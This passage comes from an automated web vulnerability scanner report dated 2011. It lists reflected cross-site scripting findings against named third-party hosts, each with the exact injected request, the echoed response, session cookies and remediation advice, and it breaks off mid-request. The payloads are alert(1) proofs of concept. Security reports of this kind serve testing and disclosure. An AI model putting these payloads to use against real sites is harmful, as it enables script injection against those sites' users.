Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/m68883"-alert(1)-"df45a6c10a?ci=ENT120&am=1&mr=1&ty=js&ep=1&at=view&rt=banner&st=image&ca=5813885&cr=43746630&pc=70169219&pr=iag.sid,2500011426&pr=iag.tfid,1141&pr=iag.pageid,70169219&pr=iag.brn,440944&pr=iag.cte,43746630&pr=iag.cmpid,5813885&pr=iag.stid,1083083&pr=iag.impid,43746630&pr=iag.advid,440944&r=3100094 HTTP/1.1
Host: secure-us.imrworldwide.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://techland.time.com/2011/10/04/apple-announces-iphone-4s-old-design-new-specs-siri-assistant/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V5=AStfNgVAJwA7EhozMRgjIypZexotWlInHlK-og__; IMRID=Tl4ooYpsGywAAC-3uO8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:35:12 GMT
Content-Type: text/javascript
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.imrworldwide.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Content-Length: 934

(function () {try { var pub = document.referrer; try { pub = parent.document.location.href; } catch (e) {} var url = ["http://secure-us.imrworldwide.com/cgi-bin/m68883"-alert(1)-"df45a6c10a?ci=ENT120&am=1&mr=1&ty=fm&ep=1&at=view&rt=banner&st=image&ca=5813885&cr=43746630&pc=70169219&pr=iag.sid,2500011426&pr=iag.tfid,1141&pr=iag.pageid,70169219&pr=iag.brn,440944&pr=iag.cte,43746630&pr=iag.
...[SNIP]...

2.43. http://secure-us.imrworldwide.com/cgi-bin/m [at parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /cgi-bin/m

Issue detail

The value of the at request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ace7"-alert(1)-"6bf94e7fc81 was submitted in the at parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/m?ci=ENT120&am=1&mr=1&ty=js&ep=1&at=view2ace7"-alert(1)-"6bf94e7fc81&rt=banner&st=image&ca=5813885&cr=43746630&pc=70169219&pr=iag.sid,2500011426&pr=iag.tfid,1141&pr=iag.pageid,70169219&pr=iag.brn,440944&pr=iag.cte,43746630&pr=iag.cmpid,5813885&pr=iag.stid,1083083&pr=iag.impid,43746630&pr=iag.advid,440944&r=3100094 HTTP/1.1
Host: secure-us.imrworldwide.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://techland.time.com/2011/10/04/apple-announces-iphone-4s-old-design-new-specs-siri-assistant/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V5=AStfNgVAJwA7EhozMRgjIypZexotWlInHlK-og__; IMRID=Tl4ooYpsGywAAC-3uO8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:35:02 GMT
Content-Type: text/javascript
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.imrworldwide.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Content-Length: 935

(function () {try { var pub = document.referrer; try { pub = parent.document.location.href; } catch (e) {} var url = ["http://secure-us.imrworldwide.com/cgi-bin/m?ci=ENT120&am=1&mr=1&ty=fm&ep=1&at=view2ace7"-alert(1)-"6bf94e7fc81&rt=banner&st=image&ca=5813885&cr=43746630&pc=70169219&pr=iag.sid,2500011426&pr=iag.tfid,1141&pr=iag.pageid,70169219&pr=iag.brn,440944&pr=iag.cte,43746630&pr=iag.cmpid,5813885&pr=iag.stid,1083083&pr=ia
...[SNIP]...

2.44. http://secure-us.imrworldwide.com/cgi-bin/m [ci parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /cgi-bin/m

Issue detail

The value of the ci request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc245"-alert(1)-"cde73d3e2c6 was submitted in the ci parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/m?ci=ENT120bc245"-alert(1)-"cde73d3e2c6&am=1&mr=1&ty=js&ep=1&at=view&rt=banner&st=image&ca=5813885&cr=43746630&pc=70169219&pr=iag.sid,2500011426&pr=iag.tfid,1141&pr=iag.pageid,70169219&pr=iag.brn,440944&pr=iag.cte,43746630&pr=iag.cmpid,5813885&pr=iag.stid,1083083&pr=iag.impid,43746630&pr=iag.advid,440944&r=3100094 HTTP/1.1
Host: secure-us.imrworldwide.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://techland.time.com/2011/10/04/apple-announces-iphone-4s-old-design-new-specs-siri-assistant/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V5=AStfNgVAJwA7EhozMRgjIypZexotWlInHlK-og__; IMRID=Tl4ooYpsGywAAC-3uO8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:35:01 GMT
Content-Type: text/javascript
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.imrworldwide.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Content-Length: 935

(function () {try { var pub = document.referrer; try { pub = parent.document.location.href; } catch (e) {} var url = ["http://secure-us.imrworldwide.com/cgi-bin/m?ci=ENT120bc245"-alert(1)-"cde73d3e2c6&am=1&mr=1&ty=fm&ep=1&at=view&rt=banner&st=image&ca=5813885&cr=43746630&pc=70169219&pr=iag.sid,2500011426&pr=iag.tfid,1141&pr=iag.pageid,70169219&pr=iag.brn,440944&pr=iag.cte,43746630&pr=iag.cmpid,5813
...[SNIP]...

2.45. http://secure-us.imrworldwide.com/cgi-bin/m [cr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /cgi-bin/m

Issue detail

The value of the cr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57984"-alert(1)-"01885e6ef6d was submitted in the cr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/m?ci=ENT120&am=1&mr=1&ty=js&ep=1&at=view&rt=banner&st=image&ca=5813885&cr=4374663057984"-alert(1)-"01885e6ef6d&pc=70169219&pr=iag.sid,2500011426&pr=iag.tfid,1141&pr=iag.pageid,70169219&pr=iag.brn,440944&pr=iag.cte,43746630&pr=iag.cmpid,5813885&pr=iag.stid,1083083&pr=iag.impid,43746630&pr=iag.advid,440944&r=3100094 HTTP/1.1
Host: secure-us.imrworldwide.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://techland.time.com/2011/10/04/apple-announces-iphone-4s-old-design-new-specs-siri-assistant/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V5=AStfNgVAJwA7EhozMRgjIypZexotWlInHlK-og__; IMRID=Tl4ooYpsGywAAC-3uO8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:35:04 GMT
Content-Type: text/javascript
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.imrworldwide.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Content-Length: 935

(function () {try { var pub = document.referrer; try { pub = parent.document.location.href; } catch (e) {} var url = ["http://secure-us.imrworldwide.com/cgi-bin/m?ci=ENT120&am=1&mr=1&ty=fm&ep=1&at=view&rt=banner&st=image&ca=5813885&cr=4374663057984"-alert(1)-"01885e6ef6d&pc=70169219&pr=iag.sid,2500011426&pr=iag.tfid,1141&pr=iag.pageid,70169219&pr=iag.brn,440944&pr=iag.cte,43746630&pr=iag.cmpid,5813885&pr=iag.stid,1083083&pr=iag.impid,43746630&pr=iag.advid,440944&r=310
...[SNIP]...

2.46. http://secure-us.imrworldwide.com/cgi-bin/m [ep parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /cgi-bin/m

Issue detail

The value of the ep request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ab52"-alert(1)-"a078b9c7116 was submitted in the ep parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/m?ci=ENT120&am=1&mr=1&ty=js&ep=14ab52"-alert(1)-"a078b9c7116&at=view&rt=banner&st=image&ca=5813885&cr=43746630&pc=70169219&pr=iag.sid,2500011426&pr=iag.tfid,1141&pr=iag.pageid,70169219&pr=iag.brn,440944&pr=iag.cte,43746630&pr=iag.cmpid,5813885&pr=iag.stid,1083083&pr=iag.impid,43746630&pr=iag.advid,440944&r=3100094 HTTP/1.1
Host: secure-us.imrworldwide.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://techland.time.com/2011/10/04/apple-announces-iphone-4s-old-design-new-specs-siri-assistant/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V5=AStfNgVAJwA7EhozMRgjIypZexotWlInHlK-og__; IMRID=Tl4ooYpsGywAAC-3uO8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:35:02 GMT
Content-Type: text/javascript
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.imrworldwide.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Content-Length: 935

(function () {try { var pub = document.referrer; try { pub = parent.document.location.href; } catch (e) {} var url = ["http://secure-us.imrworldwide.com/cgi-bin/m?ci=ENT120&am=1&mr=1&ty=fm&ep=14ab52"-alert(1)-"a078b9c7116&at=view&rt=banner&st=image&ca=5813885&cr=43746630&pc=70169219&pr=iag.sid,2500011426&pr=iag.tfid,1141&pr=iag.pageid,70169219&pr=iag.brn,440944&pr=iag.cte,43746630&pr=iag.cmpid,5813885&pr=iag.stid,10830
...[SNIP]...

2.47. http://secure-us.imrworldwide.com/cgi-bin/m [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /cgi-bin/m

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f04ee"-alert(1)-"8bfa4e88a8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/m?ci=ENT120&am=1&mr=1&ty=js&ep=1&at=view&rt=banner&st=image&ca=5813885&cr=43746630&pc=70169219&pr=iag.sid,2500011426&pr=iag.tfid,1141&pr=iag.pageid,70169219&pr=iag.brn,440944&pr=iag.cte,43746630&pr=iag.cmpid,5813885&pr=iag.stid,1083083&pr=iag.impid,43746630&pr=iag.advid,440944&r=3100094&f04ee"-alert(1)-"8bfa4e88a8a=1 HTTP/1.1
Host: secure-us.imrworldwide.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://techland.time.com/2011/10/04/apple-announces-iphone-4s-old-design-new-specs-siri-assistant/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V5=AStfNgVAJwA7EhozMRgjIypZexotWlInHlK-og__; IMRID=Tl4ooYpsGywAAC-3uO8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:35:11 GMT
Content-Type: text/javascript
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.imrworldwide.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Content-Length: 938

(function () {try { var pub = document.referrer; try { pub = parent.document.location.href; } catch (e) {} var url = ["http://secure-us.imrworldwide.com/cgi-bin/m?ci=ENT120&am=1&mr=1&ty=fm&ep=1&at=vie
...[SNIP]...
0169219&pr=iag.sid,2500011426&pr=iag.tfid,1141&pr=iag.pageid,70169219&pr=iag.brn,440944&pr=iag.cte,43746630&pr=iag.cmpid,5813885&pr=iag.stid,1083083&pr=iag.impid,43746630&pr=iag.advid,440944&r=3100094&f04ee"-alert(1)-"8bfa4e88a8a=1&si=", pub.split('/')[2] ]; var ifrm = document.createElement("IFRAME");ifrm.onerror = ifrm.onload = function () {ifrm.onerror = ifrm.onload = null;};ifrm.setAttribute("frameborder","0");ifrm.setAttr
...[SNIP]...

2.48. http://secure-us.imrworldwide.com/cgi-bin/m [pr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /cgi-bin/m

Issue detail

The value of the pr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55e95"-alert(1)-"f9fffea9ba2 was submitted in the pr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/m?ci=ENT120&am=1&mr=1&ty=js&ep=1&at=view&rt=banner&st=image&ca=5813885&cr=43746630&pc=70169219&pr=iag.sid,250001142655e95"-alert(1)-"f9fffea9ba2&pr=iag.tfid,1141&pr=iag.pageid,70169219&pr=iag.brn,440944&pr=iag.cte,43746630&pr=iag.cmpid,5813885&pr=iag.stid,1083083&pr=iag.impid,43746630&pr=iag.advid,440944&r=3100094 HTTP/1.1
Host: secure-us.imrworldwide.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://techland.time.com/2011/10/04/apple-announces-iphone-4s-old-design-new-specs-siri-assistant/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V5=AStfNgVAJwA7EhozMRgjIypZexotWlInHlK-og__; IMRID=Tl4ooYpsGywAAC-3uO8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:35:05 GMT
Content-Type: text/javascript
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.imrworldwide.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Content-Length: 935

(function () {try { var pub = document.referrer; try { pub = parent.document.location.href; } catch (e) {} var url = ["http://secure-us.imrworldwide.com/cgi-bin/m?ci=ENT120&am=1&mr=1&ty=fm&ep=1&at=view&rt=banner&st=image&ca=5813885&cr=43746630&pc=70169219&pr=iag.sid,250001142655e95"-alert(1)-"f9fffea9ba2&pr=iag.tfid,1141&pr=iag.pageid,70169219&pr=iag.brn,440944&pr=iag.cte,43746630&pr=iag.cmpid,5813885&pr=iag.stid,1083083&pr=iag.impid,43746630&pr=iag.advid,440944&r=3100094&si=", pub.split('/')[2] ]; va
...[SNIP]...

2.49. http://secure-us.imrworldwide.com/cgi-bin/m [r parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /cgi-bin/m

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee309"-alert(1)-"5aff949030a was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/m?ci=ENT120&am=1&mr=1&ty=js&ep=1&at=view&rt=banner&st=image&ca=5813885&cr=43746630&pc=70169219&pr=iag.sid,2500011426&pr=iag.tfid,1141&pr=iag.pageid,70169219&pr=iag.brn,440944&pr=iag.cte,43746630&pr=iag.cmpid,5813885&pr=iag.stid,1083083&pr=iag.impid,43746630&pr=iag.advid,440944&r=3100094ee309"-alert(1)-"5aff949030a HTTP/1.1
Host: secure-us.imrworldwide.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://techland.time.com/2011/10/04/apple-announces-iphone-4s-old-design-new-specs-siri-assistant/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V5=AStfNgVAJwA7EhozMRgjIypZexotWlInHlK-og__; IMRID=Tl4ooYpsGywAAC-3uO8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:35:11 GMT
Content-Type: text/javascript
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.imrworldwide.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Content-Length: 935

(function () {try { var pub = document.referrer; try { pub = parent.document.location.href; } catch (e) {} var url = ["http://secure-us.imrworldwide.com/cgi-bin/m?ci=ENT120&am=1&mr=1&ty=fm&ep=1&at=vie
...[SNIP]...
70169219&pr=iag.sid,2500011426&pr=iag.tfid,1141&pr=iag.pageid,70169219&pr=iag.brn,440944&pr=iag.cte,43746630&pr=iag.cmpid,5813885&pr=iag.stid,1083083&pr=iag.impid,43746630&pr=iag.advid,440944&r=3100094ee309"-alert(1)-"5aff949030a&si=", pub.split('/')[2] ]; var ifrm = document.createElement("IFRAME");ifrm.onerror = ifrm.onload = function () {ifrm.onerror = ifrm.onload = null;};ifrm.setAttribute("frameborder","0");ifrm.setAttrib
...[SNIP]...

2.50. http://secure-us.imrworldwide.com/cgi-bin/m [rt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /cgi-bin/m

Issue detail

The value of the rt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2b00"-alert(1)-"afea0a3e879 was submitted in the rt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/m?ci=ENT120&am=1&mr=1&ty=js&ep=1&at=view&rt=bannerd2b00"-alert(1)-"afea0a3e879&st=image&ca=5813885&cr=43746630&pc=70169219&pr=iag.sid,2500011426&pr=iag.tfid,1141&pr=iag.pageid,70169219&pr=iag.brn,440944&pr=iag.cte,43746630&pr=iag.cmpid,5813885&pr=iag.stid,1083083&pr=iag.impid,43746630&pr=iag.advid,440944&r=3100094 HTTP/1.1
Host: secure-us.imrworldwide.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://techland.time.com/2011/10/04/apple-announces-iphone-4s-old-design-new-specs-siri-assistant/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V5=AStfNgVAJwA7EhozMRgjIypZexotWlInHlK-og__; IMRID=Tl4ooYpsGywAAC-3uO8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:35:03 GMT
Content-Type: text/javascript
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.imrworldwide.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Content-Length: 935

(function () {try { var pub = document.referrer; try { pub = parent.document.location.href; } catch (e) {} var url = ["http://secure-us.imrworldwide.com/cgi-bin/m?ci=ENT120&am=1&mr=1&ty=fm&ep=1&at=view&rt=bannerd2b00"-alert(1)-"afea0a3e879&st=image&ca=5813885&cr=43746630&pc=70169219&pr=iag.sid,2500011426&pr=iag.tfid,1141&pr=iag.pageid,70169219&pr=iag.brn,440944&pr=iag.cte,43746630&pr=iag.cmpid,5813885&pr=iag.stid,1083083&pr=iag.impid,43
...[SNIP]...

2.51. http://secure-us.imrworldwide.com/cgi-bin/m [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /cgi-bin/m

Issue detail

The value of the st request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa094"-alert(1)-"ed6badb8a77 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/m?ci=ENT120&am=1&mr=1&ty=js&ep=1&at=view&rt=banner&st=imagefa094"-alert(1)-"ed6badb8a77&ca=5813885&cr=43746630&pc=70169219&pr=iag.sid,2500011426&pr=iag.tfid,1141&pr=iag.pageid,70169219&pr=iag.brn,440944&pr=iag.cte,43746630&pr=iag.cmpid,5813885&pr=iag.stid,1083083&pr=iag.impid,43746630&pr=iag.advid,440944&r=3100094 HTTP/1.1
Host: secure-us.imrworldwide.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://techland.time.com/2011/10/04/apple-announces-iphone-4s-old-design-new-specs-siri-assistant/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V5=AStfNgVAJwA7EhozMRgjIypZexotWlInHlK-og__; IMRID=Tl4ooYpsGywAAC-3uO8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 14:35:04 GMT
Content-Type: text/javascript
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.imrworldwide.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Content-Length: 935

(function () {try { var pub = document.referrer; try { pub = parent.document.location.href; } catch (e) {} var url = ["http://secure-us.imrworldwide.com/cgi-bin/m?ci=ENT120&am=1&mr=1&ty=fm&ep=1&at=view&rt=banner&st=imagefa094"-alert(1)-"ed6badb8a77&ca=5813885&cr=43746630&pc=70169219&pr=iag.sid,2500011426&pr=iag.tfid,1141&pr=iag.pageid,70169219&pr=iag.brn,440944&pr=iag.cte,43746630&pr=iag.cmpid,5813885&pr=iag.stid,1083083&pr=iag.impid,43746630&pr
...[SNIP]...

2.52. https://secure.customersvc.com/wes/servlet/Show [MSRSMAG parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.customersvc.com
Path:   /wes/servlet/Show

Issue detail

The value of the MSRSMAG request parameter is copied into an HTML comment. The payload 33afd-->2154f556183 was submitted in the MSRSMAG parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

POST /wes/servlet/Show HTTP/1.1
Host: secure.customersvc.com
Connection: keep-alive
Content-Length: 98
Cache-Control: max-age=0
Origin: https://secure.customersvc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://secure.customersvc.com/servlet/Show?WESPAGE=am/Services/load_email.jsp&MSRSMAG=TD
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000G-qvzH7XlMCSC3HkDKeFsLI:BA3E76BBC63F85420000019800000002AC10CF22; BIGipServersecure_http=1128181770.20480.0000

WESSTATEPAGE=am%2FState%2FServices%2Fwes_email_load.txt&WESTRANSITION=TRUE&MSRSMAG=TD33afd-->2154f556183&PUBLISHER=TI

Response

HTTP/1.1 200 Document follows
Connection: keep-alive
Accept-Ranges: bytes
Content-Type: text/html;charset=ISO-8859-1
Last-Modified: Wed, 05 Oct 2011 14:57:52 GMT
Expires: 0
Content-Language: en-US
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Date: Wed, 05 Oct 2011 14:57:53 GMT
Server: WebSphere Application Server/7.0
Content-Length: 94795


<html>
<!-- Template Header //-->


<head>


<title>


    Magazine Customer Services


</title>


<meta http-equiv="Content-Type"
...[SNIP]...
<a href="/wes/servlet/Show?WESPAGE=am/home1.jsp&MSRSMAG=TD33AFD-->2154F556183&ACTION=ENDSESSION">
...[SNIP]...

2.53. https://secure.customersvc.com/wes/servlet/Show [MSRSMAG parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.customersvc.com
Path:   /wes/servlet/Show

Issue detail

The value of the MSRSMAG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b18c2'%3b9cc60c9ea13 was submitted in the MSRSMAG parameter. This input was echoed as b18c2';9cc60c9ea13 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /wes/servlet/Show HTTP/1.1
Host: secure.customersvc.com
Connection: keep-alive
Content-Length: 98
Cache-Control: max-age=0
Origin: https://secure.customersvc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
